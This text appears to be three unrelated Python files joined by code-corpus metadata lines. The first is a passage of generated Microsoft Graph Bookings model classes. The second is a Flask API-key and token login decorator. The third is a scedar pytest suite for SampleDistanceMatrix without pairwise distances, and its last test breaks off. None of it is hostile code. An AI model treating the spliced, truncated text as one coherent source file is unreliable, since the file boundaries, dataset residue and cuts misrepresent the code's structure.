    """outlookGeoCoordinates: geographic coordinates of a location.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param accuracy: The accuracy of the latitude and longitude, e.g. accurate
     to within 50 meters.
    :type accuracy: float
    :param altitude: The altitude of the location.
    :type altitude: float
    :param altitude_accuracy: The accuracy of the altitude.
    :type altitude_accuracy: float
    :param latitude: The latitude of the location.
    :type latitude: float
    :param longitude: The longitude of the location.
    :type longitude: float
    """
    # Serialization map: attribute name -> JSON key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'accuracy': {'key': 'accuracy', 'type': 'float'},
        'altitude': {'key': 'altitude', 'type': 'float'},
        'altitude_accuracy': {'key': 'altitudeAccuracy', 'type': 'float'},
        'latitude': {'key': 'latitude', 'type': 'float'},
        'longitude': {'key': 'longitude', 'type': 'float'},
    }
    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        accuracy: Optional[float] = None,
        altitude: Optional[float] = None,
        altitude_accuracy: Optional[float] = None,
        latitude: Optional[float] = None,
        longitude: Optional[float] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        # Assign every constructor argument to the matching instance attribute.
        for attr_name, attr_value in (
            ('additional_properties', additional_properties),
            ('accuracy', accuracy),
            ('altitude', altitude),
            ('altitude_accuracy', altitude_accuracy),
            ('latitude', latitude),
            ('longitude', longitude),
        ):
            setattr(self, attr_name, attr_value)
class MicrosoftGraphPhysicalAddress(msrest.serialization.Model):
    """physicalAddress.
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param city: The city.
    :type city: str
    :param country_or_region: The country or region. It's a free-format string value, for example,
     'United States'.
    :type country_or_region: str
    :param postal_code: The postal code.
    :type postal_code: str
    :param post_office_box:
    :type post_office_box: str
    :param state: The state.
    :type state: str
    :param street: The street.
    :type street: str
    :param type: Possible values include: "unknown", "home", "business", "other".
    :type type: str or ~bookings.models.MicrosoftGraphPhysicalAddressType
    """
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'city': {'key': 'city', 'type': 'str'},
        'country_or_region': {'key': 'countryOrRegion', 'type': 'str'},
        'postal_code': {'key': 'postalCode', 'type': 'str'},
        'post_office_box': {'key': 'postOfficeBox', 'type': 'str'},
        'state': {'key': 'state', 'type': 'str'},
        'street': {'key': 'street', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        city: Optional[str] = None,
        country_or_region: Optional[str] = None,
        postal_code: Optional[str] = None,
        post_office_box: Optional[str] = None,
        state: Optional[str] = None,
        street: Optional[str] = None,
        # NOTE: 'type' shadows the builtin; the name is fixed by the generated
        # wire contract and must not be renamed.
        type: Optional[Union[str, "MicrosoftGraphPhysicalAddressType"]] = None,
        **kwargs
    ):
        super(MicrosoftGraphPhysicalAddress, self).__init__(**kwargs)
        self.additional_properties = additional_properties
        self.city = city
        self.country_or_region = country_or_region
        self.postal_code = postal_code
        self.post_office_box = post_office_box
        self.state = state
        self.street = street
        self.type = type
class OdataError(msrest.serialization.Model):
    """Top-level OData error envelope.

    All required parameters must be populated in order to send to Azure.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param error: Required.
    :type error: ~bookings.models.OdataErrorMain
    """
    # msrest validation rules: 'error' must be present on serialization.
    _validation = {
        'error': {'required': True},
    }
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'error': {'key': 'error', 'type': 'OdataErrorMain'},
    }
    def __init__(
        self,
        *,
        error: "OdataErrorMain",
        additional_properties: Optional[Dict[str, object]] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        for attr_name, attr_value in (
            ('additional_properties', additional_properties),
            ('error', error),
        ):
            setattr(self, attr_name, attr_value)
class OdataErrorDetail(msrest.serialization.Model):
    """OdataErrorDetail.
    All required parameters must be populated in order to send to Azure.
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param code: Required.
    :type code: str
    :param message: Required.
    :type message: str
    :param target:
    :type target: str
    """
    # msrest validation rules: code and message must be present.
    _validation = {
        'code': {'required': True},
        'message': {'required': True},
    }
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        code: str,
        message: str,
        additional_properties: Optional[Dict[str, object]] = None,
        target: Optional[str] = None,
        **kwargs
    ):
        super(OdataErrorDetail, self).__init__(**kwargs)
        self.additional_properties = additional_properties
        self.code = code
        self.message = message
        self.target = target
class OdataErrorMain(msrest.serialization.Model):
    """OdataErrorMain.
    All required parameters must be populated in order to send to Azure.
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param code: Required.
    :type code: str
    :param message: Required.
    :type message: str
    :param target:
    :type target: str
    :param details:
    :type details: list[~bookings.models.OdataErrorDetail]
    :param innererror: The structure of this object is service-specific.
    :type innererror: dict[str, object]
    """
    # msrest validation rules: code and message must be present.
    _validation = {
        'code': {'required': True},
        'message': {'required': True},
    }
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
        'details': {'key': 'details', 'type': '[OdataErrorDetail]'},
        'innererror': {'key': 'innererror', 'type': '{object}'},
    }
    def __init__(
        self,
        *,
        code: str,
        message: str,
        additional_properties: Optional[Dict[str, object]] = None,
        target: Optional[str] = None,
        details: Optional[List["OdataErrorDetail"]] = None,
        innererror: Optional[Dict[str, object]] = None,
        **kwargs
    ):
        super(OdataErrorMain, self).__init__(**kwargs)
        self.additional_properties = additional_properties
        self.code = code
        self.message = message
        self.target = target
        self.details = details
        self.innererror = innererror
class Paths1Bomg32BookingbusinessesBookingbusinessIdCalendarviewBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Request body schema for the calendarView appointment cancel action.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param cancellation_message:
    :type cancellation_message: str
    """
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'cancellation_message': {'key': 'cancellationMessage', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        cancellation_message: Optional[str] = None,
        **kwargs
    ):
        super().__init__(**kwargs)
        for attr_name, attr_value in (
            ('additional_properties', additional_properties),
            ('cancellation_message', cancellation_message),
        ):
            setattr(self, attr_name, attr_value)
class Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
    """Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema.
    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param cancellation_message:
    :type cancellation_message: str
    """
    # Serialization map: attribute name -> wire key and msrest type code.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'cancellation_message': {'key': 'cancellationMessage', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        additional_properties: Optional[Dict[str, object]] = None,
        cancellation_message: Optional[str] = None,
        **kwargs
    ):
        super(Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
        self.additional_properties = additional_properties
        self.cancellation_message = cancellation_message
| 1.882813 | 2 |
backend/pastry/resources/auth.py | cloughrm/Pastry | 0 | 12762195 | from functools import wraps
from pastry.models import User
from flask import request, abort, jsonify
def parse_api_key():
    """Return the ``api_key`` supplied with the current request, or None.

    The query string is consulted first, then posted form data; a falsy
    value (missing key or empty string) in either source is treated as
    absent, matching the original truthiness checks.
    """
    for source in (request.args, request.form):
        value = source.get('api_key')
        if value:
            return value
    return None
def login_required(f):
    """Decorator that guards a view with token or API-key authentication.

    Credentials are accepted either as an ``Auth-Token`` request header or
    as an ``api_key`` query/form parameter (API key takes precedence when
    both are present). Responds 401 when no credential is supplied or when
    the supplied credential fails verification. ``OPTIONS`` requests (CORS
    preflight) bypass authentication entirely.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        if request.method != 'OPTIONS':
            # Verify auth-token or api_key is present
            token = request.headers.get('Auth-Token')
            api_key = parse_api_key()
            if not token and not api_key:
                abort(401)
            # Verify key/token; api_key is checked first when both are sent.
            if api_key:
                if not User.verify_api_key(api_key):
                    response = jsonify({
                        'message': 'Invalid API Key',
                        'invalid_api_key': True,
                    })
                    response.status_code = 401
                    return response
            elif token:
                if not User.verify_auth_token(token):
                    response = jsonify({
                        'message': 'Expired Token',
                        'expired_token': True,
                    })
                    response.status_code = 401
                    return response
        # BUG FIX: this return was previously indented inside the
        # `!= 'OPTIONS'` branch, so OPTIONS requests fell through and the
        # view returned None, which Flask rejects at runtime. It must run
        # for every method so preflight requests reach the wrapped view.
        return f(*args, **kwargs)
    return decorated
| 2.609375 | 3 |
tests/test_eda/test_no_pdist_sdm.py | logstar/scedar | 17 | 12762196 | <gh_stars>10-100
import numpy as np
import matplotlib as mpl
mpl.use("agg", warn=False) # noqa
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn.metrics.pairwise
import scipy.cluster.hierarchy as sch
import scipy.sparse as spsp
import scedar.eda as eda
import pytest
class TestNoPdistSampleDistanceMatrix(object):
    """Tests for SampleDistanceMatrix constructed with use_pdist=False,
    i.e. without a precomputed pairwise distance matrix."""
    # Shared fixtures: small dense/sparse matrices reused across tests.
    x_3x2 = spsp.csr_matrix([[0, 0], [1, 1], [2, 2]])
    x_2x4_spsp = spsp.csr_matrix(np.array([[0, 1, 2, 3], [1, 2, 0, 6]]))
    x_2x4_arr = np.array([[0, 1, 2, 3], [1, 2, 0, 6]])
    # With use_pdist=False, accessing .d must raise ValueError.
    def test_valid_init(self):
        sdm = eda.SampleDistanceMatrix(self.x_3x2, metric='euclidean',
                                       use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            sdm.d
        with pytest.raises(ValueError) as excinfo:
            sdm3 = eda.SampleDistanceMatrix(
                self.x_2x4_spsp, metric='correlation', use_pdist=False,
                nprocs=5).d
        dist_mat = np.array([[0, np.sqrt(2), np.sqrt(8)],
                             [np.sqrt(2), 0, np.sqrt(2)],
                             [np.sqrt(8), np.sqrt(2), 0]])
        with pytest.raises(ValueError) as excinfo:
            sdm4 = eda.SampleDistanceMatrix(
                self.x_3x2, dist_mat, use_pdist=False)
        sdm5 = eda.SampleDistanceMatrix([[1, 2]], metric='euclidean',
                                        use_pdist=False)
        assert sdm5.tsne(n_iter=250).shape == (1, 2)
    # Empty (0, 0) input is accepted; distance-derived attributes still raise.
    def test_empty_init(self):
        with pytest.raises(ValueError) as excinfo:
            eda.SampleDistanceMatrix(np.empty(0), metric='euclidean')
        sdm = eda.SampleDistanceMatrix(
            np.empty((0, 0)), metric='euclidean', use_pdist=False)
        assert len(sdm.sids) == 0
        assert len(sdm.fids) == 0
        assert sdm._x.shape == (0, 0)
        with pytest.raises(ValueError) as excinfo:
            assert sdm._d.shape == (0, 0)
        with pytest.raises(ValueError) as excinfo:
            assert sdm._col_sorted_d.shape == (0, 0)
        with pytest.raises(ValueError) as excinfo:
            assert sdm._col_argsorted_d.shape == (0, 0)
        assert sdm.tsne(n_iter=250).shape == (0, 0)
    # Invalid metrics are accepted lazily; only accessing .d raises.
    def test_init_wrong_metric(self):
        # when d is None, metric cannot be precomputed
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(
                self.x_3x2, metric='precomputed', use_pdist=False)
        # lazy load d
        eda.SampleDistanceMatrix(self.x_3x2, metric='unknown', use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(
                self.x_3x2, metric='unknown', use_pdist=False).d
        eda.SampleDistanceMatrix(self.x_3x2, metric=1, use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(self.x_3x2, metric=1, use_pdist=False).d
        eda.SampleDistanceMatrix(self.x_3x2, metric=1., use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(self.x_3x2, metric=1., use_pdist=False).d
        eda.SampleDistanceMatrix(self.x_3x2, metric=('euclidean', ),
                                 use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(
                self.x_3x2, metric=('euclidean', ), use_pdist=False).d
        eda.SampleDistanceMatrix(self.x_3x2, metric=['euclidean'],
                                 use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            eda.SampleDistanceMatrix(self.x_3x2, metric=['euclidean'],
                                     use_pdist=False).d
    # Feature sorting works without the sample pairwise distance matrix.
    def test_sort_features(self):
        x = np.array([[0, 2, 30, 10],
                      [1, 2, 30, 10],
                      [0, 3, 33, 10],
                      [2, 5, 30, 7],
                      [2, 5, 30, 9]])
        x = spsp.csr_matrix(x)
        sdm = eda.SampleDistanceMatrix(
            x, metric='euclidean', use_pdist=False)
        sdm2 = eda.SampleDistanceMatrix(
            x, metric='euclidean', use_pdist=False)
        sdm2.sort_features(fdist_metric='euclidean', optimal_ordering=True)
        assert sdm2.fids == [2, 3, 1, 0]
    # Unpopulated t-SNE lookup entries return None.
    def test_get_tsne_kv(self):
        tmet = 'euclidean'
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        assert sdm.get_tsne_kv(1) is None
        assert sdm.get_tsne_kv(1) is None
        assert sdm.get_tsne_kv(0) is None
        assert sdm.get_tsne_kv(2) is None
    # Non-hashable keys are rejected by get_tsne_kv.
    def test_get_tsne_kv_wrong_args(self):
        tmet = 'euclidean'
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            sdm.get_tsne_kv([1, 2, 3])
        with pytest.raises(ValueError) as excinfo:
            sdm.get_tsne_kv({1: 2})
    # Invalid entries are rejected by put_tsne.
    def test_put_tsne_wrong_args(self):
        tmet = 'euclidean'
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            sdm.put_tsne(1, [1, 2, 3])
        with pytest.raises(ValueError) as excinfo:
            sdm.put_tsne({1: 2}, [1, 2, 3])
    # t-SNE runs, results match a direct eda.tsne call, and the lut
    # accumulates one entry per stored run.
    def test_tsne(self):
        tmet = 'euclidean'
        tsne_kwargs = {'metric': tmet, 'n_iter': 250,
                       'random_state': 123}
        ref_tsne = eda.tsne(self.x_3x2.toarray(), **tsne_kwargs)
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        assert sdm.tsne_lut == {}
        tsne1 = sdm.tsne(n_iter=250, random_state=123)
        np.testing.assert_allclose(ref_tsne, tsne1)
        np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
        assert tsne1.shape == (3, 2)
        assert len(sdm.tsne_lut) == 1
        tsne2 = sdm.tsne(store_res=False, **tsne_kwargs)
        np.testing.assert_allclose(ref_tsne, tsne2)
        assert len(sdm.tsne_lut) == 1
        with pytest.raises(Exception) as excinfo:
            wrong_metric_kwargs = tsne_kwargs.copy()
            wrong_metric_kwargs['metric'] = 'correlation'
            sdm.tsne(**wrong_metric_kwargs)
        assert len(sdm.tsne_lut) == 1
        with pytest.raises(Exception) as excinfo:
            sdm.tsne(metric='precomputed')
        tsne3 = sdm.tsne(store_res=True, **tsne_kwargs)
        np.testing.assert_allclose(ref_tsne, tsne3)
        # (param, ind) as key, so same params get an extra entry.
        assert len(sdm.tsne_lut) == 2
        np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
        np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(2)[1])
        assert tsne1 is not sdm.get_tsne_kv(1)[1]
        assert tsne3 is not sdm.get_tsne_kv(2)[1]
        tsne4 = sdm.tsne(store_res=True, n_iter=250, random_state=123)
        np.testing.assert_allclose(ref_tsne, tsne4)
        np.testing.assert_allclose(sdm.get_tsne_kv(3)[1], tsne4)
        assert len(sdm.tsne_lut) == 3
        tsne5 = sdm.tsne(store_res=True, n_iter=251, random_state=123)
        tsne6 = sdm.tsne(store_res=True, n_iter=251, random_state=123)
        np.testing.assert_allclose(tsne6, tsne5)
        np.testing.assert_allclose(tsne5, sdm.get_tsne_kv(4)[1])
        np.testing.assert_allclose(tsne6, sdm.get_tsne_kv(5)[1])
        assert len(sdm.tsne_lut) == 5
    # Batched t-SNE runs (serial); store_res=False must not touch the lut.
    def test_par_tsne(self):
        tmet = 'euclidean'
        param_list = [{'metric': tmet, 'n_iter': 250, 'random_state': 123},
                      {'metric': tmet, 'n_iter': 250, 'random_state': 125},
                      {'metric': tmet, 'n_iter': 250, 'random_state': 123}]
        ref_tsne = eda.tsne(self.x_3x2.toarray(), **param_list[0])
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        # If not store, should not update lut
        sdm.par_tsne(param_list, store_res=False)
        assert sdm._lazy_load_last_tsne is None
        assert sdm.tsne_lut == {}
        # store results
        tsne1, tsne2, tsne3 = sdm.par_tsne(param_list)
        np.testing.assert_allclose(ref_tsne, tsne1)
        np.testing.assert_allclose(ref_tsne, tsne3)
        np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
        assert tsne1.shape == (3, 2)
        assert len(sdm.tsne_lut) == 3
        np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
        np.testing.assert_allclose(tsne2, sdm.get_tsne_kv(2)[1])
        np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(3)[1])
        np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(1)[1])
    # Same as test_par_tsne but with multiprocessing (nprocs=3).
    def test_par_tsne_mp(self):
        tmet = 'euclidean'
        param_list = [{'metric': tmet, 'n_iter': 250, 'random_state': 123},
                      {'metric': tmet, 'n_iter': 250, 'random_state': 125},
                      {'metric': tmet, 'n_iter': 250, 'random_state': 123}]
        ref_tsne = eda.tsne(self.x_3x2.toarray(), **param_list[0])
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        # If not store, should not update lut
        sdm.par_tsne(param_list, store_res=False, nprocs=3)
        assert sdm._lazy_load_last_tsne is None
        assert sdm.tsne_lut == {}
        # store results
        tsne1, tsne2, tsne3 = sdm.par_tsne(param_list, nprocs=3)
        np.testing.assert_allclose(ref_tsne, tsne1)
        np.testing.assert_allclose(ref_tsne, tsne3)
        np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
        assert tsne1.shape == (3, 2)
        assert len(sdm.tsne_lut) == 3
        np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
        np.testing.assert_allclose(tsne2, sdm.get_tsne_kv(2)[1])
        np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(3)[1])
        np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(1)[1])
    # Accessing _last_tsne lazily computes a default embedding.
    def test_tsne_default_init(self):
        tmet = 'euclidean'
        tsne_kwargs = {'metric': tmet, 'n_iter': 250,
                       'random_state': 123}
        ref_tsne = eda.tsne(self.x_3x2.toarray(), **tsne_kwargs)
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        init_tsne = sdm._last_tsne
        assert init_tsne.shape == (3, 2)
        assert len(sdm.tsne_lut) == 1
        tsne2 = sdm.tsne(store_res=True, **tsne_kwargs)
        np.testing.assert_allclose(ref_tsne, tsne2)
        assert len(sdm.tsne_lut) == 2
    # Integer-index subsetting; .d remains unavailable on the subset.
    def test_ind_x(self):
        sids = list("abcdef")
        fids = list(range(10, 20))
        sdm = eda.SampleDistanceMatrix(
            np.random.ranf(60).reshape(6, -1),
            sids=sids, fids=fids, use_pdist=False)
        # select sf
        ss_sdm = sdm.ind_x([0, 5], list(range(9)))
        assert ss_sdm._x.shape == (2, 9)
        assert ss_sdm.sids == ['a', 'f']
        assert ss_sdm.fids == list(range(10, 19))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select with Default
        ss_sdm = sdm.ind_x()
        assert ss_sdm._x.shape == (6, 10)
        assert ss_sdm.sids == list("abcdef")
        assert ss_sdm.fids == list(range(10, 20))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select with None
        ss_sdm = sdm.ind_x(None, None)
        assert ss_sdm._x.shape == (6, 10)
        assert ss_sdm.sids == list("abcdef")
        assert ss_sdm.fids == list(range(10, 20))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select non-existent inds
        with pytest.raises(IndexError) as excinfo:
            sdm.ind_x([6])
        with pytest.raises(IndexError) as excinfo:
            sdm.ind_x(None, ['a'])
    # Empty integer-index selections yield empty views without distances.
    def test_ind_x_empty(self):
        sids = list("abcdef")
        fids = list(range(10, 20))
        sdm = eda.SampleDistanceMatrix(
            np.random.ranf(60).reshape(6, -1), sids=sids, fids=fids,
            use_pdist=False)
        empty_s = sdm.ind_x([])
        assert empty_s._x.shape == (0, 10)
        with pytest.raises(Exception) as excinfo:
            empty_s._d
        assert empty_s._sids.shape == (0,)
        assert empty_s._fids.shape == (10,)
        empty_f = sdm.ind_x(None, [])
        assert empty_f._x.shape == (6, 0)
        with pytest.raises(Exception) as excinfo:
            empty_f._d
        assert empty_f._sids.shape == (6,)
        assert empty_f._fids.shape == (0,)
        empty_sf = sdm.ind_x([], [])
        assert empty_sf._x.shape == (0, 0)
        with pytest.raises(Exception) as excinfo:
            empty_sf._d
        assert empty_sf._sids.shape == (0,)
        assert empty_sf._fids.shape == (0,)
    # ID-based subsetting mirrors ind_x but raises ValueError on bad ids.
    def test_id_x(self):
        sids = list("abcdef")
        fids = list(range(10, 20))
        sdm = eda.SampleDistanceMatrix(
            np.random.ranf(60).reshape(6, -1),
            sids=sids, fids=fids, use_pdist=False)
        # select sf
        ss_sdm = sdm.id_x(['a', 'f'], list(range(10, 15)))
        assert ss_sdm._x.shape == (2, 5)
        assert ss_sdm.sids == ['a', 'f']
        assert ss_sdm.fids == list(range(10, 15))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select with Default
        ss_sdm = sdm.id_x()
        assert ss_sdm._x.shape == (6, 10)
        assert ss_sdm.sids == list("abcdef")
        assert ss_sdm.fids == list(range(10, 20))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select with None
        ss_sdm = sdm.id_x(None, None)
        assert ss_sdm._x.shape == (6, 10)
        assert ss_sdm.sids == list("abcdef")
        assert ss_sdm.fids == list(range(10, 20))
        with pytest.raises(Exception) as excinfo:
            ss_sdm.d
        # select non-existent inds
        # id lookup raises ValueError
        with pytest.raises(ValueError) as excinfo:
            sdm.id_x([6])
        with pytest.raises(ValueError) as excinfo:
            sdm.id_x(None, ['a'])
    # Empty ID selections yield empty views without distances.
    def test_id_x_empty(self):
        sids = list("abcdef")
        fids = list(range(10, 20))
        sdm = eda.SampleDistanceMatrix(
            np.random.ranf(60).reshape(6, -1),
            sids=sids, fids=fids, use_pdist=False)
        empty_s = sdm.id_x([])
        assert empty_s._x.shape == (0, 10)
        with pytest.raises(Exception) as excinfo:
            empty_s._d
        assert empty_s._sids.shape == (0,)
        assert empty_s._fids.shape == (10,)
        empty_f = sdm.id_x(None, [])
        assert empty_f._x.shape == (6, 0)
        with pytest.raises(Exception) as excinfo:
            empty_f._d
        assert empty_f._sids.shape == (6,)
        assert empty_f._fids.shape == (0,)
        empty_sf = sdm.id_x([], [])
        assert empty_sf._x.shape == (0, 0)
        with pytest.raises(Exception) as excinfo:
            empty_sf._d
        assert empty_sf._sids.shape == (0,)
        assert empty_sf._fids.shape == (0,)
    # Property getters; tsne_lut returns a defensive copy with equal values.
    def test_getter(self):
        tmet = 'euclidean'
        sdm = eda.SampleDistanceMatrix(
            self.x_3x2, metric=tmet, use_pdist=False)
        with pytest.raises(Exception) as excinfo:
            sdm.d
        assert sdm.metric == tmet
        assert sdm.tsne_lut == {}
        assert sdm.tsne_lut is not sdm._tsne_lut
        assert sdm.tsne_lut == sdm._tsne_lut
        sdm.tsne(n_iter=250)
        assert sdm.tsne_lut is not sdm._tsne_lut
        for k in sdm.tsne_lut:
            np.testing.assert_equal(sdm.tsne_lut[k], sdm._tsne_lut[k])
    # Nearest-neighbor queries need the pairwise distances and must raise.
    def test_s_ith_nn_d(self):
        nn_sdm = eda.SampleDistanceMatrix([[0], [1], [5], [6], [10], [20]],
                                          metric='euclidean', use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            nn_sdm.s_ith_nn_d(0)
    # Same: neighbor index lookup is unavailable without pdist.
    def test_s_ith_nn_ind(self):
        nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
                                           [6, 6, 6], [10, 10, 10],
                                           [20, 20, 20]],
                                          metric='euclidean',
                                          use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            nn_sdm.s_ith_nn_ind(0)
    # Same: k-NN lookup table is unavailable without pdist.
    def test_knn_ind_lut(self):
        nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
                                           [6, 6, 6], [10, 10, 10],
                                           [20, 20, 20]],
                                          metric='euclidean', use_pdist=False)
        with pytest.raises(ValueError) as excinfo:
            nn_sdm.s_knn_ind_lut(0)
    # Image-comparison test: t-SNE scatter colored by feature '5'; plotting
    # must not mutate the underlying data or ids.
    @pytest.mark.mpl_image_compare
    def test_sdm_tsne_feature_gradient_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.tsne_feature_gradient_plot(
            '5', figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Same plot with a value transform applied to the gradient.
    @pytest.mark.mpl_image_compare
    def test_sdm_tsne_feature_gradient_plus10_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.tsne_feature_gradient_plot(
            '5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Gradient plot restricted to a subset of sample labels.
    @pytest.mark.mpl_image_compare
    def test_sdm_tsne_feature_gradient_plot_sslabs(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        sdm.tsne_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            transform=lambda x: np.log(x+1),
            figsize=(10, 10), s=50)
        fig = sdm.tsne_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Selecting no labels must still produce a (blank) figure.
    @pytest.mark.mpl_image_compare
    def test_sdm_tsne_feature_gradient_plot_sslabs_empty(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.tsne_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels=[],
            figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Mismatched or missing label arguments must raise ValueError.
    def test_sdm_tsne_feature_gradient_plot_sslabs_wrong_args(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        # Mismatch labels
        with pytest.raises(ValueError) as excinfo:
            sdm.tsne_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=[11],
                figsize=(10, 10), s=50)
        with pytest.raises(ValueError) as excinfo:
            sdm.tsne_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=['i'],
                figsize=(10, 10), s=50)
        # labels not provided
